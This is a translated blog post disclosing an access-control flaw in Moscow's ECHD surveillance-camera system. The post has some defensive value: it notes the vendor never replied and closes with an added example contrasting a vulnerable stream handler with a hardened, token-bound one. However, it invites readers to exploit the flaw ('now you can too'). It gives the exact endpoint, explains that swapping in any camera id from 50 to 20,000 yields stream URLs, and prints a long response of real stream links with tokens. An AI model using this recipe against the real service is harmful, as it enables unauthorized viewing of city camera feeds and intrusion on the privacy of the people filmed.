Unauthorized access obtained to more than 20,000 video surveillance cameras in Moscow (and now you can too)

Hi, Habrahabr! Surely many of you remember the legendary post "The sources of 3300 global Internet projects were obtained", which for a long time held first place in the rating of all publications on the site. Despite the similar title of my post, I do not claim first place, but I think you should pay attention.



This story began late in the evening, when I stayed late at work to finish an urgent task for our partners from Amsterdam. Having finished testing the last module, I sat back in my chair with satisfaction and, out of habit, went to check my page on VK. In one of the public groups I follow, I saw a photo from a surveillance camera with official data overlaid on it. Intrigued by this photo, I asked the author of the image for access to this camera.

To my surprise, they answered me. I was told that you can get a temporary access link, which is valid for a week and does not allow you to control the camera or view the archive.

Link:

obmen-video.echd.ru/embed/noauth/здесь_много_соли

Being thoughtful by nature, I looked at the page source and found the following:

window.APP_VERSION = '0.1';
window.BUILD_ID = 'public';
window.embeddedCamera = {"id":******,"name":"MMC_***; такой-то парк","shortName":"MMC_***","address":"такой-то адрес ","description":null,"type":{"id":4,"color":"0D0D0D"},"cameraType":4,"apiType":"ECHD_CISCO_VSM","fixed":false,"status":0,"lat":"***","lng":"***"};
window.Request = {"id":"4a6a19d5-ab03-4cb1-8fc4-281345c873f5","innerId":"******","userId":***,"ttl":1422353451835}; // Mapped HTTP request (POST/GET params)

It's easy to guess that by using the following URL

http://obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=666&_=1421929669467

I got the following set of streams:

{"666":{"archive":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAPXC6W7XEKRZRM47PZUOA3IC54IA2SQRM7UVZ5GRJLG5Z5QVU3MZD54L7Y3TUXKT37FEKQLGCTLIEXWT6BHTNWUIVWXMJ27PT4PSGWVQ/token-1422045167179-archive?rec","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T7Y2M5WLHCIIDEU4L6SGIICY35JRUYPBV4TPHSOIONYI43SQ2FJHOCJIRYHVB6XL7VBWNBEN6TDNTLBSCLLF3I5BZQC3ZKKLSH6OTTVQ/token-1422045167179-archive?rec"],"shot":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTY3CQ6NSIVAQCKZH3VHGASAUT5CO/token-1422045167183-archiveSnapshot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6RSS6W77H7EZOEUDHGJYBBHSDBUC/token-1422045167183-archiveSnapshot"],"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTYTTINJRDZ2GL7WOO7SZ7ZPBCHYI/token-1422045167183-archiveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6R2H6KF2MR6CEMATGWCCCTHISRR7FT2YTBP4YYIJ3OL2NO2H3HNFKA/token-1422045167183-archiveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAWITQRF3YOGFW4MY5G6HIXB4Q4BJWMEAUFWUSDRYIHMSSV7TIERGLPA
6ZSKAH4PZBIWTHDGHUUZC7MN63V4EQVDG6ZG7WB3UJPLFPN2UMVPLN4FQQGMPK2LHN6DPZ7WWD/token-1422045167179-archive?recarchive","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T63RJ6RODZTXZJFRMZSVUTHTK5UJRLEBV6BMZJLIIS6HEEV4HSTYSPCZMFZXP3LMKAHRSDZZ5COMCC2ITAXECLVW2LULL5TAEYY3U6H34HIN4ZH6WS55JQNX57IB3X6RY/token-1422045167179-archive?recarchive"]},"live":{"ios":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live?m3u","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live?m3u"]},"shot":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167174-liveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167174-liveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV4
3JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live"]},"version":100}}

You can access the streams of a camera with an arbitrarily selected ID. The first streams are the camera archive; the last one is the live broadcast.

Opening the URL with any player (VLC, for example), we can see the following:



This camera is not very representative in terms of image quality, but the original MMC_*** camera produced a pretty decent picture with a good frame rate.

In short: paste a link of the form obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=XXX&_=1421929669467 into the browser (where XXX is an arbitrary identifier; I tried numbers from 50 to 20,000), and you get a set of streams that you can open in the media player on your smartphone, and with due persistence you can watch yourself smoking at the entrance of your own house ...
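An added example (not code from the original post or from the ECHD system) that models the check the ajaxGetVideoUrls endpoint lacked: the temporary share token, with the innerId and ttl fields seen in window.Request above, should decide which camera may be read, not the id parameter in the URL. All function names, hosts and stream URLs here are constructed.

```javascript
// Added example, not code from the original post or the ECHD system.
// Models the share-link endpoint and the authorization it should enforce.
// Field names follow window.Request from the post: id (share token),
// innerId (camera id the link was issued for), ttl (expiry, epoch ms).

// Constructed sample data: one share link issued for camera 666.
const shareLinks = new Map([
  ["4a6a19d5-ab03-4cb1-8fc4-281345c873f5", { innerId: "666", ttl: 1422353451835 }],
]);

// Constructed stand-ins for the per-camera stream URLs (hypothetical hosts).
const streamUrls = {
  "666": { live: "http://stream.example/666/live", archive: "http://stream.example/666/archive" },
  "667": { live: "http://stream.example/667/live", archive: "http://stream.example/667/archive" },
};

// A sample "current time" that lies before the link's ttl, so the demo is deterministic.
const SAMPLE_NOW = 1422000000000;

// The behaviour described in the post: the id query parameter alone
// selects the camera, so any id (the author tried 50 to 20,000) returns its streams.
function getVideoUrlsVulnerable(cameraId) {
  return streamUrls[String(cameraId)] || null;
}

// Hardened handler: the share token is looked up server-side, checked for
// expiry, and bound to exactly one camera; the requested id must match it.
// Temporary links grant the live stream only, since the post says they
// must not allow controlling the camera or opening the archive.
function getVideoUrlsHardened(shareToken, cameraId, now) {
  const link = shareLinks.get(shareToken);
  if (!link) return { error: "unknown token" };
  if (now >= link.ttl) return { error: "expired token" };
  if (link.innerId !== String(cameraId)) return { error: "forbidden" };
  return { live: streamUrls[link.innerId].live };
}
```

The hardened variant also removes the need for a guessable numeric id in the request at all: the server could derive the camera from the token alone and ignore the parameter.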



As you might guess, all of this belongs to the ECHD (Unified Data Storage Center). I tried to contact them about the vulnerability, but I never received a response. I hope that after this publication the bug will finally be fixed.

Thanks for your attention.
